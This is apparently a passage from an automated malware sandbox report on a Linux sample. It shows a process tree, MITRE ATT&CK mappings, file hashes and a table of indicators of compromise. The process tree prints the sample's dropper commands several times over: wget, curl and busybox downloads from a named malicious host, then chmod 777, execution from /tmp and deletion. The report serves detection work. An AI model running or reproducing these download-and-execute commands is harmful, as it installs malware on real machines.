  /bin/busybox wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  PID:985
- /bin/chmod
  chmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - File and Directory Permissions Modification
  PID:986
- /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  ./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - Executes dropped EXE
  PID:987
- /bin/rm
  rm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  PID:988
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - System Network Configuration Discovery
  PID:989
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:990
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - System Network Configuration Discovery
  PID:992
- /bin/chmod
  chmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - File and Directory Permissions Modification
  PID:993
- /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  ./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - Executes dropped EXE
  PID:994
- /bin/rm
  rm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  PID:995
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - System Network Configuration Discovery
  PID:996
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:997
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - System Network Configuration Discovery
  PID:999
- /bin/chmod
  chmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - File and Directory Permissions Modification
  PID:1000
- /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  ./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - Executes dropped EXE
  PID:1001
- /bin/rm
  rm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  PID:1002
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - System Network Configuration Discovery
  PID:1003
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1004
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - System Network Configuration Discovery
  PID:1006
- /bin/chmod
  chmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - File and Directory Permissions Modification
  PID:1007
- /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  ./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - Executes dropped EXE
  PID:1008
- /bin/rm
  rm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  PID:1009
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - System Network Configuration Discovery
  PID:1010
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1011
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - System Network Configuration Discovery
  PID:1013
- /bin/chmod
  chmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - File and Directory Permissions Modification
  PID:1014
- /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  ./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - Executes dropped EXE
  PID:1015
- /bin/rm
  rm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  PID:1016
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - System Network Configuration Discovery
  PID:1017
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1018
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - System Network Configuration Discovery
  PID:1020
- /bin/chmod
  chmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - File and Directory Permissions Modification
  PID:1021
- /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  ./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - Executes dropped EXE
  PID:1022
- /bin/rm
  rm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  PID:1023
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - System Network Configuration Discovery
  PID:1024
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1025
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - System Network Configuration Discovery
  PID:1027
- /bin/chmod
  chmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - File and Directory Permissions Modification
  PID:1028
- /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  ./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - Executes dropped EXE
  PID:1029
- /bin/rm
  rm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  PID:1030

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n	761	b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr	783	pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij	814	R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR	828	rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK	835	rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll	858	ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD	882	2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd	889	sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv	896	7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI	903	5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4	910	FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH	917	tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb	924	2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN	931	e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb	938	2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN	945	e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n	952	b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr	959	pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij	966	R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR	973	rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK	980	rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll	987	ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv	994	7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI	1001	5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4	1008	FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH	1015	tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD	1022	2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd	1029	sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd